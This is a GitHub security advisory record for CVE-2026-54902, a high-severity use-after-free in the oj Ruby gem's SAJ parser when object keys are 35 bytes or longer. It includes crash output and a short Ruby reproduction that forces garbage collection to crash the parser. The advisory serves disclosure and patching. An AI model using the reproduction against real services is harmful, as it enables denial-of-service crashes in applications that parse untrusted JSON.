GHSA-m578-w5vf-rfcm

Source

https://github.com/advisories/GHSA-m578-w5vf-rfcm

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-m578-w5vf-rfcm/GHSA-m578-w5vf-rfcm.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-m578-w5vf-rfcm

Aliases

CVE-2026-54902

Published

2026-06-19T20:47:28Z

Modified

2026-06-19T21:00:15.727000581Z

Severity

8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator

Summary

Oj: Use-After-Free in Oj::Parser SAJ Long Key Callback

Details

Summary

Oj::Parser in SAJ mode does not protect cached object keys (≥ 35 bytes) from garbage collection. A Ruby callback that triggers GC inside hash_end can cause the key string to be reclaimed while the C parser still holds a pointer to it. The subsequent access to the freed string VALUE results in a segfault, confirmed by an RIP pointing to address 0x4242 (a canary-style pattern suggesting control over the freed memory's content).

Version

Software: oj gem
Affected: all versions with ext/oj/saj2.c / ext/oj/parser.c
Latest tested: 3.17.1 (confirmed present)

Details

Short keys (≤ 34 bytes) are stored inline on the C stack and are safe. Long keys (≥ 35 bytes) are stored as heap-allocated Ruby String objects passed to rb_funcall as the key argument. Between the key being resolved and the callback completing, a GC triggered inside the callback (e.g. GC.start) can collect the key String, leaving a dangling VALUE.

Crash output:

long_key_trigger
[BUG] Segmentation fault at 0x0000000000004242
    close_object+0x260    /ext/oj/usual.c:405  (calls rb_funcall with freed key)
    parse+0x11ff          /ext/oj/parser.c:693
    parser_parse+0x145    /ext/oj/parser.c:1408

RIP: 0x7fd1b46d68b7  RDI: 0x0000000000004242  (freed key VALUE)
R12: 0x0000000000004242

The freed VALUE 0x4242 shows the attacker-controlled content of the key string was loaded as a pointer — a classic use-after-free indicator.

Reproduce

require 'oj'

class H < Oj::Saj
  def add_value(value, key)
    GC.start(full_mark: true, immediate_sweep: true) if key == 'x'
  end
  def hash_start(key); end
  def hash_end(key); end
end

p = Oj::Parser.new(:saj)
p.handler = H.new
p.parse('{"' + 'A' * 35 + '":{"x":1}}')  # long outer key, GC fires on inner key

Database specific

{
    "nvd_published_at": null,
    "github_reviewed_at": "2026-06-19T20:47:28Z",
    "github_reviewed": true,
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-416"
    ]
}

References

Affected packages

RubyGems / oj

Package

Name: oj
Purl: pkg:gem/oj

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.17.3

Affected versions

0.*

0.5

0.5.1

0.5.2

0.6.0

0.7.0

0.8.0

0.9.0

1.*

1.0.0

1.0.1

1.0.2

1.0.3

1.0.4

1.0.5

1.0.6

1.1.0

1.1.1

1.2.0

1.2.1

1.2.2

1.2.3

1.2.4

1.2.5

1.2.6

1.2.7

1.2.8

1.2.9

1.2.10

1.2.11

1.2.12

1.2.13

1.3.0

1.3.2

1.3.4

1.3.5

1.3.6

1.3.7

1.4.0

1.4.1

1.4.2

1.4.3

1.4.4

1.4.5

1.4.6a2

1.4.6

1.4.7

2.*

2.0.0

2.0.1

2.0.2

2.0.3

2.0.4

2.0.5

2.0.6

2.0.7

2.0.8

2.0.9

2.0.10

2.0.11

2.0.12

2.0.13

2.0.14

2.1.0

2.1.1

2.1.2

2.1.3

2.1.4

2.1.6

2.1.7

2.2.0

2.2.1

2.2.2

2.2.3

2.3.0

2.4.0

2.4.1

2.4.2

2.4.3

2.5.1

2.5.2

2.5.3

2.5.4

2.5.5

2.6.0

2.6.1

2.7.0

2.7.1

2.7.2

2.7.3

2.8.0

2.8.1

2.9.0

2.9.1

2.9.2

2.9.3

2.9.4

2.9.5

2.9.6

2.9.7

2.9.8

2.9.9

2.10.0

2.10.1

2.10.2

2.10.3

2.10.4

2.11.0

2.11.1

2.11.2

2.11.3

2.11.4

2.11.5

2.12.0

2.12.1

2.12.2

2.12.3

2.12.4

2.12.5

2.12.6

2.12.7

2.12.8

2.12.9

2.12.10

2.12.11

2.12.12

2.12.13

2.12.14

2.13.0

2.13.1

2.14.0

2.14.1

2.14.2

2.14.3

2.14.4

2.14.5

2.14.6

2.15.0

2.15.1

2.16.0

2.16.1

2.17.0

2.17.1

2.17.2

2.17.3

2.17.4

2.17.5

2.18.0

2.18.1

2.18.2

2.18.3

2.18.4

2.18.5

3.*

3.0.0

3.0.1

3.0.2

3.0.3

3.0.4

3.0.5

3.0.6

3.0.7

3.0.8

3.0.9

3.0.10

3.0.11

3.1.0

3.1.2

3.1.3

3.1.4

3.2.0

3.2.1

3.3.0

3.3.1

3.3.2

3.3.3

3.3.4

3.3.5

3.3.6

3.3.7

3.3.8

3.3.9

3.3.10

3.4.0

3.5.0

3.5.1

3.6.0

3.6.2

3.6.3

3.6.4

3.6.5

3.6.6

3.6.7

3.6.8

3.6.9

3.6.10

3.6.11

3.6.12

3.6.13

3.7.0

3.7.1

3.7.2

3.7.3

3.7.4

3.7.5

3.7.6

3.7.7

3.7.8

3.7.9

3.7.10

3.7.11

3.7.12

3.8.0

3.8.1

3.9.0

3.9.1

3.9.2

3.10.0

3.10.1

3.10.2

3.10.3

3.10.5

3.10.6

3.10.7

3.10.8

3.10.9

3.10.10

3.10.11

3.10.12

3.10.13

3.10.14

3.10.15

3.10.16

3.10.17

3.10.18

3.11.0

3.11.1

3.11.2

3.11.3

3.11.4

3.11.5

3.11.6

3.11.7

3.11.8

3.12.0

3.12.1

3.12.2

3.12.3

3.13.0

3.13.1

3.13.2

3.13.3

3.13.4

3.13.5

3.13.6

3.13.7

3.13.8

3.13.9

3.13.10

3.13.11

3.13.12

3.13.13

3.13.14

3.13.15

3.13.16

3.13.17

3.13.18

3.13.19

3.13.20

3.13.21

3.13.22

3.13.23

3.14.0

3.14.1

3.14.2

3.14.3

3.15.0

3.15.1

3.16.0

3.16.1

3.16.2

3.16.3

3.16.4

3.16.5

3.16.6

3.16.7

3.16.8

3.16.9

3.16.10

3.16.11

3.16.12

3.16.13

3.16.14

3.16.15

3.16.16

3.16.17

3.17.0

3.17.1

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-m578-w5vf-rfcm/GHSA-m578-w5vf-rfcm.json"

last_known_affected_version_range

"< 3.17.2"